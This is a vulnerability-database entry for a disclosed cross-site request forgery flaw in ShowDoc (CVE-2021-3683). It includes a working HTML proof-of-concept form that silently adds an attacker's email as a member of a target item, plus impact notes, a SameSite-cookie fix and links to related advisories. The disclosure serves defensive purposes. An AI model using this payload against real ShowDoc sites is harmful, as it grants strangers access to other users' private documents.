Lucene search
Amammad063A339A-5D78-40D6-A96A-6716960E8134HistoryAug 03, 2021 - 6:06 p.m.
Cross-Site Request Forgery (CSRF) in star7th/showdoc
2021-08-0318:06:06
amammad
www.huntr.dev
8
0.001 Low
EPSS
Percentile
31.2%
✍️ Description
With CSRF vulnerability Attacker able to add any member to for any item if users visit attacker site.
🕵️♂️ Proof of Concept
1.Open the PoC.html In Firefox or safari.
2.now you can check that member with email address [email protected] that already should registered befor have access to item with id 1531601670203340.
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.showdoc.com.cn/server/index.php?s=/api/member/save" method="POST">
<input type="hidden" name="item_id" value="1531601670203340" />
<input type="hidden" name="username" value="evil@mail.com" />
<input type="hidden" name="cat_id" value="0" />
<input type="hidden" name="member_group_id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
💥 Impact
This vulnerability is capable of reveal any item.
Fix
Set SameSite attribute of cookies to Lax or Strict.
Related
nvd
nvd
CVE-2021-3683
2021-11-13 10:15:07
cve
cve
CVE-2021-3683
2021-11-13 10:15:07
osv
osv
showdoc is vulnerable to Cross-Site Request Forgery (CSRF)
2021-11-15 23:13:52
CVE-2021-3683
2021-11-13 10:15:07
cvelist
cvelist
CVE-2021-3683 Cross-Site Request Forgery (CSRF) in star7th/showdoc
2021-11-13 09:30:11
github
github
showdoc is vulnerable to Cross-Site Request Forgery (CSRF)
2021-11-15 23:13:52
cnvd
cnvd
ShowDoc Cross-Site Request Forgery Vulnerability
2021-11-16 00:00:00
prion
prion
Cross site request forgery (csrf)
2021-11-13 10:15:00
veracode
veracode
Cross-Site Request Forgery (CSRF)
2021-11-15 03:07:34